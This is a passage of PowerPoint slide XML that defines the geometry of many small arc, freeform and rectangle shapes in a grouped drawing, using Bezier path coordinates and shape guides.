              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1011" y="2242"/>
                  <a:ext cx="24" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 1380 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 32394 w 32394"/>
                    <a:gd name="T1" fmla="*/ 20090 h 22980"/>
                    <a:gd name="T2" fmla="*/ 44 w 32394"/>
                    <a:gd name="T3" fmla="*/ 0 h 22980"/>
                    <a:gd name="T4" fmla="*/ 21600 w 32394"/>
                    <a:gd name="T5" fmla="*/ 1380 h 22980"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="32394" h="22980" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32393" y="20089"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="29111" y="21983"/>
                        <a:pt x="25389" y="22980"/>
                        <a:pt x="21600" y="22980"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="22980"/>
                        <a:pt x="0" y="13309"/>
                        <a:pt x="0" y="1380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="919"/>
                        <a:pt x="14" y="459"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="32394" h="22980" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32393" y="20089"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="29111" y="21983"/>
                        <a:pt x="25389" y="22980"/>
                        <a:pt x="21600" y="22980"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="22980"/>
                        <a:pt x="0" y="13309"/>
                        <a:pt x="0" y="1380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="919"/>
                        <a:pt x="14" y="459"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21600" y="13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9" name="Arc 1143">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43098171-72BA-6E43-9A4B-A5B622B5EFFD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1012" y="2242"/>
                  <a:ext cx="22" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 1437 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 32065 w 32065"/>
                    <a:gd name="T1" fmla="*/ 20332 h 23037"/>
                    <a:gd name="T2" fmla="*/ 48 w 32065"/>
                    <a:gd name="T3" fmla="*/ 0 h 23037"/>
                    <a:gd name="T4" fmla="*/ 21600 w 32065"/>
                    <a:gd name="T5" fmla="*/ 1437 h 23037"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="32065" h="23037" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32065" y="20332"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28862" y="22106"/>
                        <a:pt x="25261" y="23037"/>
                        <a:pt x="21600" y="23037"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="23037"/>
                        <a:pt x="0" y="13366"/>
                        <a:pt x="0" y="1437"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="957"/>
                        <a:pt x="15" y="478"/>
                        <a:pt x="47" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="32065" h="23037" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32065" y="20332"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28862" y="22106"/>
                        <a:pt x="25261" y="23037"/>
                        <a:pt x="21600" y="23037"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="23037"/>
                        <a:pt x="0" y="13366"/>
                        <a:pt x="0" y="1437"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66680" name="Arc 1144">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D98132-4008-8140-8C0A-CA3EA48ABA83}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2211"/>
                  <a:ext cx="18" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4236 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25836"/>
                    <a:gd name="T1" fmla="*/ 419 h 32090"/>
                    <a:gd name="T2" fmla="*/ 23118 w 25836"/>
                    <a:gd name="T3" fmla="*/ 32090 h 32090"/>
                    <a:gd name="T4" fmla="*/ 4236 w 25836"/>
                    <a:gd name="T5" fmla="*/ 21600 h 32090"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25836" h="32090" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="419"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1394" y="140"/>
                        <a:pt x="2813" y="0"/>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0"/>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1" name="Arc 1145">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10DD7478-47A6-AD47-8507-00957C4A37C0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2212"/>
                  <a:ext cx="17" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4042 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25642"/>
                    <a:gd name="T1" fmla="*/ 381 h 32484"/>
                    <a:gd name="T2" fmla="*/ 22700 w 25642"/>
                    <a:gd name="T3" fmla="*/ 32484 h 32484"/>
                    <a:gd name="T4" fmla="*/ 4042 w 25642"/>
                    <a:gd name="T5" fmla="*/ 21600 h 32484"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25642" h="32484" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="381"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1332" y="127"/>
                        <a:pt x="2685" y="0"/>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0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66682" name="Arc 1146">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2668C0E4-5467-1243-ADE0-5F223FEB3B74}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1082" y="2225"/>
                  <a:ext cx="16" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17021 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13298 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 28665"/>
                    <a:gd name="T2" fmla="*/ 18193 w 21600"/>
                    <a:gd name="T3" fmla="*/ 28665 h 28665"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17021 h 28665"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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3" name="Arc 1147">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D12BF29-44C4-404C-B67B-D33E6B2B3580}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1082" y="2226"/>
                  <a:ext cx="15" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17280 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12960 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 29262"/>
                    <a:gd name="T2" fmla="*/ 17972 w 21600"/>
                    <a:gd name="T3" fmla="*/ 29262 h 29262"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17280 h 29262"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="29262" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12960" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18399" y="4079"/>
                        <a:pt x="21600" y="10481"/>
                        <a:pt x="21600" y="17280"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="21544"/>
                        <a:pt x="20337" y="25713"/>
                        <a:pt x="17971" y="29261"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="29262" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12960" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66684" name="Arc 1148">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7432130B-7BB0-234F-98C6-B37FE86800CA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2237"/>
                  <a:ext cx="20" cy="20"/>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5" name="Arc 1149">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90C514AC-A4C0-904F-B9AB-6AC12C259839}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2238"/>
                  <a:ext cx="19" cy="18"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66686" name="Arc 1150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC0BA7F-2DBF-184B-B16F-E117FDBDDB09}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1005" y="2225"/>
                  <a:ext cx="10" cy="17"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21583 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12736 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41281 h 41281"/>
                    <a:gd name="T2" fmla="*/ 20755 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41281"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21583 h 41281"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41281" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12736" y="41280"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4984" y="37792"/>
                        <a:pt x="0" y="30082"/>
                        <a:pt x="0" y="21583"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9982"/>
                        <a:pt x="9163" y="453"/>
                        <a:pt x="20754" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41281" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12736" y="41280"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4984" y="37792"/>
                        <a:pt x="0" y="30082"/>
                        <a:pt x="0" y="21583"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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7" name="Arc 1151">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E6B4A2-0105-424C-A30E-FBD0B1DC340B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1006" y="2226"/>
                  <a:ext cx="9" cy="15"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21584 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12827 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41322 h 41322"/>
                    <a:gd name="T2" fmla="*/ 20766 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41322"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21584 h 41322"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41322" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12826" y="41322"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5026" y="37855"/>
                        <a:pt x="0" y="30119"/>
                        <a:pt x="0" y="21584"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9979"/>
                        <a:pt x="9169" y="448"/>
                        <a:pt x="20766" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41322" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12826" y="41322"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5026" y="37855"/>
                        <a:pt x="0" y="30119"/>
                        <a:pt x="0" y="21584"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66688" name="Arc 1152">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0626D291-2BFE-024D-99ED-A1747D714E20}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1034" y="2249"/>
                  <a:ext cx="43" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21340 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 39157 w 39157"/>
                    <a:gd name="T1" fmla="*/ 12212 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 39157"/>
                    <a:gd name="T3" fmla="*/ 3343 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21340 w 39157"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="39157" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39156" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35129" y="18087"/>
                        <a:pt x="28463" y="21600"/>
                        <a:pt x="21340" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10701" y="21600"/>
                        <a:pt x="1646" y="13853"/>
                        <a:pt x="0" y="3342"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="39157" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39156" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35129" y="18087"/>
                        <a:pt x="28463" y="21600"/>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9" name="Arc 1153">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FA2B33-B99D-B543-B22E-16F2EF796986}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1035" y="2249"/>
                  <a:ext cx="40" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21316 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38879 w 38879"/>
                    <a:gd name="T1" fmla="*/ 12574 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38879"/>
                    <a:gd name="T3" fmla="*/ 3488 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21316 w 38879"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38879" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38878" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34822" y="18239"/>
                        <a:pt x="28283" y="21600"/>
                        <a:pt x="21316" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10732" y="21600"/>
                        <a:pt x="1708" y="13932"/>
                        <a:pt x="-1" y="3488"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38879" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38878" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34822" y="18239"/>
                        <a:pt x="28283" y="21600"/>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690" name="Group 1154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F59A24-AC97-4647-9017-7E460F52EDAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1523" y="332"/>
              <a:ext cx="170" cy="169"/>
              <a:chOff x="775" y="1966"/>
              <a:chExt cx="170" cy="169"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66691" name="Freeform 1155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA11A10-7A0B-EC47-990C-587DB75B4302}"/>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92" name="Freeform 1156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF19A4A-FF4C-F546-B70B-EF1A06DA9977}"/>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93" name="Rectangle 1157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38B22B9-029D-1145-8189-45D74BBE697B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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94" name="Rectangle 1158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B26878E-684C-114B-8B1C-65870ABB3003}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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95" name="Freeform 1159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4615C93-1D40-7B42-B0DA-9A4A5FEFF015}"/>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96" name="Freeform 1160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B2C866-8D11-D946-A5FC-B061C0C570E5}"/>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97" name="Freeform 1161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431CD39A-F2F8-CB40-9255-9EFD4EBEFD79}"/>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98" name="Freeform 1162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F54CD84C-6259-904D-BFB3-4736608BD4FF}"/>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699" name="Freeform 1163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B46B6F-8909-EC4F-9A51-75A59307B844}"/>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0" name="Freeform 1164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E8FF2D5-88E5-C047-B9D0-699F07798F31}"/>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01" name="Rectangle 1165">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE626AFC-63BB-4440-BDF2-45A337BDAF0D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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702" name="Rectangle 1166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758AE7F1-C840-E940-8D7D-782687016DE4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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703" name="Freeform 1167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092387A4-99C2-2B4C-8222-1571178C1184}"/>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4" name="Freeform 1168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA71E05-B9EE-7546-89A3-09C8D9A8ABC8}"/>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05" name="Freeform 1169">
                <a:extLst>
